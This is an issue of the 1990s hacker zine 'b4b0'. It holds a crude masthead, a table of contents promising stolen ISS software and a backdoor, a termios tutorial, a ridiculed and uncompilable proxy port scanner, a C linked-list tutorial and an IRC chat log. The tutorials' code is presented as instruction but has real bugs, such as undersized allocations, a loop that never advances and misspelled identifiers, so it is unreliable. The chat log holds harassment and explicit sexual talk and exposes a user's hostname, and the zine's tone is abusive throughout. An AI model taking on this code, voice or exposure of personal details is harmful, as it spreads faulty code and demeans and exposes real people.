Copy Link
Add to Bookmark
Report
B4b0 06
,d$$$
`$$Ss. .s` $$$ $$$S$$$ sS$$ $Ss.
`$$S$. .$' $$$ $$$$$$' .$$S' `S$S.
$$$$ .$' $$$ $$$$$' .S$$' `S$S.
$$$$' .d$' $$$ $$$$' $$$$ $$$$
$$$$ .$S' $$$ $$$$ $$$$ $$$$
$$$$$SSSSSss. .S$S' .$$$ $$$$$s. $$$$ $$$$
$$$$$"~ `$Ss.`S$$ d$$$. $$$$S'~`~S$$Ss.$$$$ $$$$
$$$$' `$$Ss. $s. .dS$$$$s.`~ "S$$Ss.$$ $$$$
$$$$ $$$$$ $$$$$$$$$$$$$$$$$ `$$$$$s$ $$$$
$$$$ $$$$$ `S$$$$' ssss $$$$$$ $$$$
$$$$ $$$$' `$$$ $$$$ $$$$$$ $$$$
$$$$. $$$' $$$ $$$$ $$$$$$ $$$$
$$$$$b. .,sS$' $$$ $$$$ $$$$'$. .$S$'
`S$$$$$SsS$$$$$' d$$$ $$$$$Ss. .sS$$$$'$SS. .SS$'
d$$$$ `S$$$$$SsS$$$$"` `S$$ $$S'
.d$$$$$
`$$$$$'
`~~~
s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x
[ don't even try to cramp our style. bitch. ]
s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x
(y0u thought we w0uldn't, we c0uldn't. *nOW THEN*, BITCH.)
editor of this issue )----------------------------> jorge
editor of last issue )--------- -------- ---------> Qytpo
QUIT )----------------------------> jsbach
)-------- ---------- --------> Qytpo
)-------- --------> Volatile
------------------------------
staff
grey0p )--------------------------------------> gr1p
jAh0rGe )--- --------- --- ------ ---> jorge
aaszEm )--- -------- --- ------ --- ---> assem
tEEp )--- ------- - --- ------ --- ---> tip
kArAck )--- - -- --- - --- ---> chrak
rAhAlf )--- --- - - --- - --- ---> r4lph
sehgvEE )--- --- ----- --- --- - --- ---> segv
mihLk )--- ----- --- - ---> m1lk man
0hdaye )--------------------------------------> ohday
g4ry nU )--- ------- ------ ------ ------ -----> gary gnu
j4hy )--------------------------------------> j\
b4b0 Official Linux command of the month ------> setfont sc.fnt
b4b0 Official site of the month )--------------> linuxwww.db.erau.edu/LPG
b4b0 Official Idiot the Month )--------------> bronc buster
warriorised )----------------------------------> www.antionline.com
fun )-----------------------------> fadetoblack.com/namegenerator
more fun )-----------------------------> taunting inmates while on a
prison tour
interesting )-----------------------------> reading b4b0!
dull )-----------------------------> sektorgrl :/
gay )-----------------------------> purple teletubbie
comedy )-----------------------------> so1o applied to ISS and sent
them a list of sites he hacked
"I got in trouble thanks to b4b0.."
"Oh ? How's that?"
"Well, i was in class on a computer, and i went to www.b4b0.org. When it
loaded, the shit said 'bitch ill fuck yo ass up' and the speakers were on
high. "
[ table of contents ]
[1]==[ Editor's werdz ] [ jorge ]==[1]
[2]==[ Termios library ] [ assem ]==[2]
[3]==[ Bronc Buster Elite ] [ jnz ]==[3]
[4]==[ OOP in C ] [ lore ]==[4]
[5]==[ Logs ] [ b4b0 ]==[5]
[6]==[ Idiot of the Month ] [ b4b0 ]==[6]
[7]==[ Tampax Dox ] [ Gary Gnu ]==[7]
[8]==[ EINS and the z39.50 Protocol Suite ] [ gr1p ]==[8]
[9]==[ Intro to *BSD Socket Layer Internals ] [ jayenz ]==[9]
[10]=[ Dumbest Shit Ever ] [ ResiD ]=[10]
[11]=[ b4b0 Advisory ] [ b4b0 ]=[11]
[12]=[ !! ISS Company Secret Warez !! ] [ * ]=[12]
[13]=[ ripping skills elite (phusnttt.c) ] [ phusnkin ]=[13]
[14]=[ hackphreak .history files ] [ mod ]=[14]
[15]=[ message queues ] [ Canul ]=[15]
[16]=[ el8 Morpheus warez #hacking elitez ] [ b4b0 ]=[16]
[17]=[ b4b0 linux x86 asm codez ] [ chrak ]=[17]
[18]=[ Idiocy on Dialouts / Dialout Info ] [ jorge ]=[18]
[ Other stuff in this issue of b4b0 ]
warez/pr0n.html - uNF uNF
warez/server.c - gummo back door (? ph1xs creation)
warez/gjp.tar - Gay Juarez Project (dumb warez)
warez/qps.gz - KKRs scanner
warez/jester.tar.gz - neat. take a look at it. Team QOS's work. (verbal)
warez/selling.out - HomeySan wrote this. Read it. Fear.
. . .
"What's the point of a government when they want to govern me?"
-- Pennywise
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 1 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
Editors Words.
Hi.
We've had some rough times in b4b0. Lotza people quitting due to lack of
this and that, because he or she, whatever. No matter we stick-and-move
and continue on. Thiz issue seriously kicks ass. We've got everything from
stolen iss warez, to tampax dox. so1o might even have a 'guest appearence'
h0h. fear. anyways. Enjoy.
--jorge
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 2 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
TERMINAL I/O LIBRARY
assem <assem@hom.net>
[ SEE termios.tgz ]
The termios library is a POSIX compatible frontend for otherwise,
unportable ioctl() calls. In the late 1970's, System III developed a different
set of terminal routines from Version 7. System V continued to hold these same
System III routines while Berkeley systems used the Version 7 routines. This
article is an introduction to the termio library and some of the aspects and
resources you can use with it.
Terminal I/O consists of two modes:
1. Canonical mode -> line processing, read() reads at most one line
per call.
2. Noncanonical mode -> data is not assembled into lines.
If you have ever tinkered with some programming and input requests I'm
sure you have noticed that your fgets() and scanf("%s", buffer); reads a line
with \n\0 trailing the data. This is canonical mode. You also may have heard
of getch() which uses noncanonical mode, reads() one character per call.
Let's draw a couple of conclusions... since all of the read requests
you call that read from stdin (standard input) are canonical based, and only
getch() appears to be noncanonical, wouldn't you assume canonical is default?
Yes, it is.
The text editor I am writing this article in (emacs), at the touch
of my fingertips to the keyboard I see the key I stroked appear on my
screen. I haven't hit carriage return yet, therefore, wouldn't emacs be
noncanonical based? Yes, it is, and so are most (if not all) text editors.
That wasn't too hard, was it? Let's get down to the termios functions.
NOTE: This article probably won't be advantagous to you unless you are
looking for examples of termios code to play with or you are a complete
moron. This is basically manual (man) pages with slightly more
comprehensible language (or maybe not?).
#include <termios.h>
struct termios {
tcflag_t c_iflag; /* input flags */
tcflag_t c_oflag; /* output flags */
tcflag_t c_cflag; /* control flags */
tcflag_t c_lflag; /* local flags */
cc_t c_cc[NCCS]; /* control characters */
};
speed_t cfgetispeed(const struct termios *term);
speed_t cfgetospeed(const struct termios *term);
int cfsetispeed(struct termios *term, speed_t speed);
int cfsetospeed(struct termios *term, speed_t speed);
int tcdrain(int fd);
int tcflow(int fd, int action);
int tcflush(int fd, int queue);
int tcgetattr(int fd, struct termios *term);
int tcsendbreak(int fd, int duration);
int tcsetattr(int fd, int opt, const struct termios *term);
Hey not too much, eh?
Let's take a look at the members of the termios structure and
the flags that are behind it.
*** NOTE ***
These the the POSIX.1 flags only!
struct termios {
tcflag_t c_iflag;
BRKINT generate SIGINT on BREAK
ICRNL map CR (carriage) to NL on input
IGNBRK ignore BREAK
IGNCR ignore CR
IGNPAR ignore characters with parity errors
INLCR map NL to CR on input
INPCK enable input parity checking
ISTRIP strip eighth bit off input characters
IXOFF enable start/stop input flow control
IXON enable start/stop output flow control
PARMRK mark parity errors
tcflag_t c_oflag;
ONOEOT discard EOTs on output (^D)
tcflag_t c_cflag;
CLOCAL ignore modem status lines
CREAD enable receiver
CSIZE character size mask
CSTOPB send two stop bits, else one
HUPCL hangup on last close
PARENB parity enable
PARODD odd parity, else even
tcflag_t c_lflag;
ECHO enable echo
ECHOE visually erase characters
ECHOK echo kill
ECHONL echo NL
ICANON canonical input
IEXTEN enable extended input character processing
ISIG enable terminal-generated signals
NOFLSH disable flush after interrupt or quit
TOSTOP send SIGTTOU for background output
cc_t c_cc[NCS];
CR carriage return \r (can not change)
EOF end of file
EOL end of line
ERASE backspace ^H
INTR interrupt, SIGINT ^C
KILL delete line ^U
NL linefeed \n (can not change)
QUIT quit ^\
START resume output ^Q
STOP stop output ^S
SUSP suspend ^Z
*** NOTE ***
By inserting a 'V' in front of the before mentioned control characters
(i.e. VEOF) you have the subscript you use to reference and change the
control character values...
example:
term.c_cc[VEOF] = 1;
};
Alright, now that we've gone over the various flags and control
characters let's play with the terminal settings. tcgetattr() and
tcsetattr() are the get terminal and set terminal attributes calls. Let's
review the calls real quick first.
int tcgetattr(int fd, struct termios *term);
int tcsetattr(int fd, int opt, struct termios *term);
opt is specified as one of the following:
TCSANOW - Change occurs immediately.
TCSADRAIN - Change occurs after all output has been transmitted.
Use if you are changing the c_oflag parameters.
TCSAFLUSH - Occurs after all output has been transmitted. When
change takes place all input in the queue that is
un-read is flushed.
Both return 0 if successful, -1 on failure.
Here is an example of dos and curses's library routine, getch().
(see getch.c)
Now, let's review the library...
int tcgetattr ( int fd, struct termios *termios_p );
tcgetattr () fills the ptr to the termios structure using the
object associated with fd.
EXAMPLE:
struct termios term;
if (tcgetattr(fileno(stdin), &term) < 0) die("tcgetattr broke!");
int tcsetattr ( int fd, int optional_actions, struct termios *termios_p );
tcsetattr () uses the information stored in the ptr to termios to
set the terminal characteristics of the object associated with fd.
EXAMPLE:
struct termios term;
if (tcgetattr(fileno(stdin), &term) < 0) die("tcgetattr failed!");
term.c_cc[VINTR] = 7; /* interrupt control character becomes ^G */
if (tcsetattr(fileno(stdin), TCSANOW, &term) < 0) die("tcsetattr failed!");
int tcsendbreak ( int fd, int duration );
tcsendbreak () generates a BREAK to the object associated with the
descriptor for duration.
int tcdrain ( int fd );
tcdrain () waits until all output written to fd has been
transmitted.
EXAMPLE:
#define flush(x) tcdrain(x)
flush(fileno(stdout));
int tcflush ( int fd, int queue_selector );
discards data written but not transmitted or data received but not
read, depending on queue_selector.
queue_selector can be set to these values:
TCIFLUSH - flushes data received but not read.
TCOFLUSH - flushes data written but not transmitted.
TCIOFLUSH - TCIFLUSH and TCOFLUSH
EXAMPLE:
tcflush(fileno(stdout), TCIOFLUSH);
int tcflow ( int fd, int action );
tcflow () stops or resumes transmission or reception of data to
and from the system.
EXAMPLE:
extern char sLock = 0;
void scroll_lock()
{
switch(sLock) {
case '0':
if (tcflow(fileno(stdout), TCOOFF) < 0)
die("tcflow died!");
sLock = 1;
break;
case '1':
if (tcflow(fileno(stdout), TCOON) < 0)
die("tcflow died!");
sLock = 0;
break;
default:
die("internal error!");
break;
}
}
int cfmakeraw ( struct termios *termios_p );
cfmakeraw () sets the terminal attributes as follows:
termios_p->c_iflag &= ~(IGNBRK|BRKINT|PARMRK|ISTRIP
|INLCR|IGNCR|ICRNL|IXON);
termios_p->c_oflag &= ~OPOST;
termios_p->c_lflag &= ~(ECHO|ECHONL|ICANON|ISIG|IEXTEN);
termios_p->c_cflag &= ~(CSIZE|PARENB);
termios_p->c_cflag |= CS8;
speed_t cfgetospeed ( struct termios *termios_p );
speed_t cfgetispeed ( struct termios *termios_p );
cfgetospeed () returns the output baud rate stored in the termios
structure.
cfgetispeed () return the input baud rate stored in the termios
structure.
EXAMPLE:
tcgetattr(fileno(stdin), &termin);
tcgetattr(fileno(stdout), &termout);
printf("terminal baud rate..\ninput: %q\noutput: %q\n",
cfgetispeed(&termin), cfgetospeed(&termout));
int cfsetospeed ( struct termios *termios_p, speed_t speed );
int cfsetispeed ( struct termios *termios_p, speed_t speed );
cfsetospeed () sets the terminal output baud rate.
cfsetispeed () sets the terminal input baud rate.
EXAMPLE:
tcgetattr(fileno(stdin), &termin);
tcgetattr(fileno(stdout), &termout);
cfsetispeed(&term, B57600);
cfsetospeed(&term, B57600);
Included in the file I have compiled a few functions to set
certain terminal modes and a few macros and functions to play with various
of the before mentioned terminal modes.
(see aterm.h)
This article was written as a learning experience for myself and
for others over the terminal input/output library, termios. Some of the
code is untested and I am human so I am likely to have errors in my
article, please email assem@hom.net with any errors you find and if you
feel like it, a correction.
- assem
email: assem@hom.net
web: http://weapons.org
. . .
<Interrupt> if you think I am a moron go to www.hackphreak.org and read my
lecture
<Interrupt> then say I am a moron
<Interrupt> joeshmoe: no, I do not code in C I only shell script
<Interrupt> umm, ever heard of .bat files?
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 3 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
Bronc Busters elite Skills shown
lore <lore@b4b0.org>
This code was given to me by module:
/*
* Web proxy port scanner v1.0 by bronc
* to complie: gcc ppscan.c -o ppscan
* to use: ./ppscan <proxy> <port> <target> <start_port> <stop_port>
* If thoes two lines are to hard for you, you should not be using it..
*
* Due to about 200 error messages, this doesnt compile
* by br0nk, no wonder its hella broken.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <string.h>
#define MAX 256
int main(int argc, char **argv[]) <--- char **argv[], good one bronc
{
int socks, start, stop, i; <--- don't bother zeroing anything
struct hostent *bounce; <--- elite
struct sockaddr_in proxey;
char temp[MAX+1];
char buffer[MAX+1];
char connected[]="<html> Connection established <//html>";
char port[6];
char *target =argv[3];
printf("\nProxey Port Scanner v1.0");
printf("\nby Bronc Buster\n");
if(argc<5)
exit(printf("Usage: %s <proxey> <port> <target> <start_port> <stop_port>",argv[0]));
/* get IP of proxey */
bounce=gethostbyname(argv[1]);
if(!bounce) exit(printf("Domain lookup error"));
proxey.sin_family=AF_INET;
proxey.sin_addr.s_addr=*(long *)(bounce->h_addr);
/* set ports to start and stop at */
start=atoi(argv[4]);
stop=atoi(argv[5]);
/* loop to scan our ports */
for(i=start;i<=stop;i++)
{
/* create socket */
bounce.sin_port=htons(atoi(argv[2]));
socks=socket(AF_INET,SOCK_STREAM,0);
if(socks<0) exit(printf("Socket error"));
port=i;
/* format the string we want to send */
strcpy(temp,"CONNECT: ");
strcat(temp,target); <--- What if our target happens to be 258 bytes
strcat(temp," "); long Bronc?
strcat(temp,port);
/* connect, send string and read back reply */
if(connect(socks,(struct sockaddr *)&proxey, sizeof(proxey))<0)
exit(printf("Connection error"));
write(socks,temp,strlen(temp)); <-- man send
if(read(socks,buffer,sizeof(buffer))<0) <-- man recv
exit(printf("Read error"));
if(strcmp(buffer,connected)<=0)
printf("\nPort: %i open",&i);
/* close socket and loop back */
close(socks);
}
printf("\nScan finished");
return 0;
}
/* EOF */
. . .
<t00neses> is there a netscape that I can use on a shell?
I hate this lynx shit with no pictures
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 4 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
OOP programming in C
lore <lore@b4b0.org>
--------------------------------------
Object Orientated Programming in C
--------------------------------------
Part 1
OOP. The thing that makes C such a powerful language, and yet, quite a lot
of C programmers (or people who think they are) don't even know what a
structure is. They look at other people's code, and rip it without even
a clue what it does. So here it is, for all of you who are interested,
"How to handle objects within the C language."
Linked-lists
------------
Linked-lists are extremely important and are used in every kernel, almost
every daemon there is and probably even the text view you're using right
now. A linked-list is created by using a pointer that points to the same
structure within a structure. For example:
typedef struct a_struct a_Struct;
struct a_struct {
int a_value;
a_Struct * prev;
a_Struct * next;
};
With this, we can create a stack of objects. And we can add and remove
objects from this stack, this method is much more cleaner than using an
array like, say, a_Struct[100]. It is much more easy and efficent to
remove elements using linked-lists.
Consider this. We're writing an IRC client, and need a list to hold each
and every server, to do this, we need not just the canonical name of the
server, but it's ircd port too. So we could create a structure like this:
typedef struct server Server;
struct server {
char * name;
unsigned short port;
Server * prev;
Server * next;
};
Then, we would need a two global pointers, one that points to the head of
the list, and one that points to the bottom, and we must sure that
functions manage these pointers properly. So:
Server * serverhead = NULL;
Server * servertail = NULL;
Now, if we wish to add an element to the linked-list, we can weite
something like this:
int add_server(char * server_name, unsigned short server_port)
{
Server * new_server = NULL; /* Our new element on the stack */
/* Allocate memory for our element */
new_server = (Server *)malloc(sizeof(struct server));
/* And now we add the neccessary variables to the structure */
/* See below for copy */
copy(&new_server->name, server_name);
new_server->port = server_port;
new_server->prev = NULL;
new_server->next = NULL;
/* Now we check to if the head of top list exists */
if (!Serverhead)
{
/* There are currently no elements on the stack */
serverhead = new_server;
servertail = new_server;
}
else
{
/* We add the new element onto the end of the stack */
servertail->next = new_server;
new_server->prev = servertail;
servertail = new_server
}
return (1);
}
/* Much better way of copying memory */
int copy(char * * str1, char * str2)
{
if (!*str1 || !str2) return (-1);
*str1 = (char *)malloc(strlen(str2));
strcpy(*str1, str2);
return (1);
}
There, we can add lots of servers to a list now. So do something like:
int main(int argc, char * * argv)
{
Server * current_server = NULL; /* A pointer to the current server */
add_server("dallas.tx.us.undernet.org", 6667);
add_server("mclean.va.us.undernet.org", 6667);
add_server("los-angeles.ca.us.undernet.org", 6667);
add_server("london.uk.eu.undernet.org", 6667);
/* Make the current server point to the serverlist head, while the
current server exists, do this, and at the end, goto the next
server in the list
*/
for (current_server = serverhead; current_server; current_server =
current_server)
{
fprintf(stdout, "%s:%d\n", current_server->name,
current_server->port);
}
exit(1);
}
There. I think you see what I'm getting at now. If we want to remove an
element from the list, do something like this:
int remove_server(char * server_name)
{
Server * current_server = NULL;
/* Locate the server */
for (current_server = serverhead; current_server; current_server =
current_server->next)
{
if (strcmp(current_server->name, server_name) == 0)
break;
}
/* The element doesn't exist on the list */
if (current_server == NULL) return (-1);
/* We now remove the server */
if (current_server->next && current_server->prev)
{
/* Both previous and next elements exist, so we relink */
current_server->prev->next = current_server->next;
current_server->next->prev = current_server->prev;
free(current_server);
}
else if (current_server->next)
{
/* This element is the head of the list */
current_server->next->prev = Null;
serverhead = current_server->next;
free(current_server);
}
else if (current_server->prev)
{
/* This element is the tail of the list */
current_server->prev->next = Null;
servertail = current_server->prev;
free(current_server);
}
else
{
/* This element is the only member of the list */
serverhead = NULL;
servertail = NULL;
free(current_server);
}
return (1);
}
Linked-lists are very powerful, and can be used for anything. Their more
complex counterpart, the Balanced Tree, will be discussed next issue.
. . .
<MostHateD> hahaha, remember the time I pinged your
router non-stop?
.cRk. [Signoff/MostHateD(#hackphreak)] (Ping timeout)
. . .
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 5 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
Logs
picking up an irc wh0re:
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i missed u last night,
ur touch, your lips..
[msg(bobbie)] who the fuck are u?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] im sorry do I know u
[msg(bobbie)] APPARENTLY NOT.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] why did u message me?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] did I message u?
[msg(bobbie)] [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i missed
u last night, ur touch, your lips..
[msg(bobbie)] EXPLAIN THAT
[msg(bobbie)] deluded fucker.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] I'm sorry, i thought
ur my boyfriend
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] im sorry
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] he uses the same nick!
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i apologize
[msg(bobbie)] gibb0r me sib0r seckz
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] whats this?
[msg(bobbie)] cheers
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] why ar eu getting so
mad?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u having a bad day?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] wow! u do have a big
attitude problem
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i DID fucking say Im
sorry OK???
[msg(bobbie)] shut your self-righteous yapping. good day.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] fuck u!
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] asshole!
[msg(bobbie)] oh, that was an excellent retort.
[msg(bobbie)] the handy phrase, 'fuck u' works wonders.
[msg(bobbie)] take care.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] asshooell!
[msg(bobbie)] 'asshooell' [sic] ?
[msg(bobbie)] ok.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] assshollle!
[msg(bobbie)] cheers.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] whats ur problem
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i dont undersatdnm
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] why did u get SOOO
upset?
[msg(bobbie)] hmmm, look in the mirror.
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| bobbie (datasoftte@pool-207-205-160-121.nwrk.grid.net) (Internic Network)
³ ircname : *******
³ server : irc.mindspring.com ([207.69.200.132] MindSpring Enterprises IRC
Serve)
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] its intriguing
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] wherer iu at?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u a male or female
[msg(bobbie)] hahaha, your attempts at subtle retortion fall short.
[msg(bobbie)] your typos really spice up your messages.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] what do u have on?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] thanks
[msg(bobbie)] i have a sour face on.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] typing fast
[msg(bobbie)] later.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u hard?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u havent cum for a
while, have u?
[msg(bobbie)] you are truly twisted.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] can u suck ur own
cock?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] may be u should do
that
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] how old r u?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i'm curious
[msg(bobbie)] only an idiot would ask that.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] I'm fuming
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i'm so mad!
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] how old r u?
[msg(bobbie)] it's the mentality of beavis and butthead.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] male or female
[msg(bobbie)] you're so mad and you ask me why i'm mad?
[msg(bobbie)] ok.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] so how old r u?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] stud!
[msg(bobbie)] what does it matter?
[msg(bobbie)] typical irc question.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i'm curious
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i wanna know
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] please?
[msg(bobbie)] i'm five years old.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] no way!
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] honest?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] LOL
[msg(bobbie)] yes.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] pleas eplease please
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] tell me!
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] where r u at?
[msg(bobbie)] what does it matter?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i said I wanna know,
why ask so many questions
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] c'mon please
[msg(bobbie)] i live in newark.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] new jersey
[msg(bobbie)] check out the brains on bobbie!
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] :)
[msg(bobbie)] i'll talk to you later.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u at work?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ok so how old r u?
[msg(bobbie)] why? u available for a quickie or something?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] um may be:)
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u just playing with
me or r u really that mad? I hope u r just playing:)
[msg(bobbie)] whatever.
[msg(bobbie)] it's entertaining, really.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] :)
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ok my name is alice
i'm 26
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] your turn:)
[msg(bobbie)] so, u wanna give up the clam?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] lets start all over
again:)
[msg(bobbie)] ok.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] :)
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] see Im smiling
[msg(bobbie)] i'm phil, 5 years old, and my last name's mckraken.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u r not five:)
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] hi Phil
[msg(bobbie)] so u available for a quickie?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i might b eif u tell
me ur age
[msg(bobbie)] don't u have a bf?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i'm single have a
boyfriend
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] yes
[msg(bobbie)] cool, i'll tag team with him for a threesome.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] no:)
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] see a 5 yr old doesnt
talk like this
[msg(bobbie)] i'm a horny 5 year old.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] will u please tell me
how old r u? dont worry if u are old, cause I like older guys:)
[msg(bobbie)] i'm 87.
[msg(bobbie)] oh, and a half.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] c'mon!!!!!!!!
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u r driving me crazy!
[msg(bobbie)] i thought you were mad?
[msg(bobbie)] ok, like, i'm a 30something guy
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] honest?
[msg(bobbie)] people call me RLoxley
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] whats that?>
[msg(bobbie)] it's my skills to the bills.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i dont understand
[msg(bobbie)] it's okay, that's expected.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] thanks
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u know how to put
people down
[msg(bobbie)] huh? you took that the wrong way.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] no i didnt
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u haev been not nice
with me from the start
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] and I dont know why
[msg(bobbie)] what that meant was that noone gets it either, so i wasn't
expecting you too
[msg(bobbie)] er, to not too
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ok
[msg(bobbie)] hey, so like, do you have a picture or something?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] so are you married or
have a girlfriend?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i dont have a picture
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] do you?
[msg(bobbie)] i'm both married and have a gf.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u r kidding again
[msg(bobbie)] my slut gf on the side is sktor grl
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] its not fun anymore
[msg(bobbie)] yes it is.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] what do u have on now?
[msg(bobbie)] i got like a thong and stuff on.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] liar!
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] whats yor dick like?
[msg(bobbie)] it's like most dicks
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] have u ever measured
it?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] cut or uncut?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] how tall r u?
[msg(bobbie)] it's cut
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] weight?
[msg(bobbie)] like 6', 210 lbs
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] do u work out?
[msg(bobbie)] sure.
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] will u tell me
something honestly now/
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ?
[msg(bobbie)] what?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] were u really that mad
or u r just playing and if u were, why?:)
[msg(bobbie)] any idiots who take irc that seriously need to be flogged.
[msg(bobbie)] what do you think?
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] :)
[bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ok Im feeling much
better now:)
[msg(bobbie)] so, u available for that quickie now?
